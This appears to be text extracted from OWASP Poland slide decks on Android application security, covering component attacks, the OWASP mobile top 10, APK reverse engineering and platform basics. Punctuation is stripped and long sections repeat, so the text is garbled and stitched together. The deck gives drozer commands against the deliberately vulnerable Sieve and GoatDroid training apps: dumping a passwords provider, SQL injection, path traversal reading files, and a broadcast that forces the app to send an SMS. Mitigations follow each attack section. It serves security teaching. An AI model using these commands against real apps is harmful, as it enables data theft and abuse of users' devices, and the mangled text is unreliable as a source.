Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Android fundamentals
Andrii SygidaOWASP Poland24022016
Agendabull Android Architecturebull Android security fundamentalsbull Android 60 security releasebull Google security features
Introbull Android is the worlds most popular mobile platformFeaturesbull Multi-taskingbull Widgetsbull Notificationsbull Voice Typing and Actionsbull Photos and videobull Most widely used smartphone OSbull Phones tablets Google TV and more
Statsbull There are 12 billion mobile users By 2018 that number with
be 5 billion bull Mobile adoption is growing 8x faster than traditional web
applications bull Mobile payments will exceed $90 Billion by 2017
Bugcrowd Cybersecurity Research 2015
Android Architecture
Linux Kernelbull The architecture is based on the Linux ( started from 26)
kernel bull This layer is core of android architecture It provides
service like power management memory management security etc
bull It helps in software or hardware binding for better communication
Librariesbull The next layer is the Androidrsquos native libraries bull It is this layer that enables the device to handle different types
of data bull The WebKit library is responsible for browser support SQLite is
for database FreeType for font support Media for playing and recording audio and video formats
Android Runtimebull Core librariesbull Dalvik Virtual Machinebull DVM vs JVM Differencesbull ART
Dalvik VMbull The software that runs the apps on Android devicesbull Its fast even on weak CPUs bull it will run on systems with little memory bull it will run in an energy-efficient way bull Provides application portability and runtime consistency bull Runs optimized file format (dex) and Dalvik bytecodebull Java class jar files converted to dex at build time
ART VS DVMbull Android 44 ndash Experimental From android 50 - Defaultbull Ahead-of-time (AOT) compilationbull Improved garbage collectionbull Improved diagnostic detail in exceptions and crash reports
Application FrameworkActivity Manager Manages the activity life cycle of applications
Content Providers Manage the data sharing between applications
Telephony Manager Manages all voice calls
Location Manager Location management using GPS or cell tower
Resource Manager Manage the various types of resources we use in our Application
Application Layer bull SMS client appbull Dialerbull Web browserbull Contact manager
APK how itrsquos works
Android Application Security
bull Android sandbox
bull Permission labels defined in AndroidManifestxml
bull Signature
bull Install time security decisionsbull Android 60 Security release
Android 60bull Runtime Permissionsbull Verified Bootbull Hardware-Isolated Security bull Fingerprintsbull SD Card Adoptionbull Clear Text Traffic bull System Hardeningbull USB Access Control
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
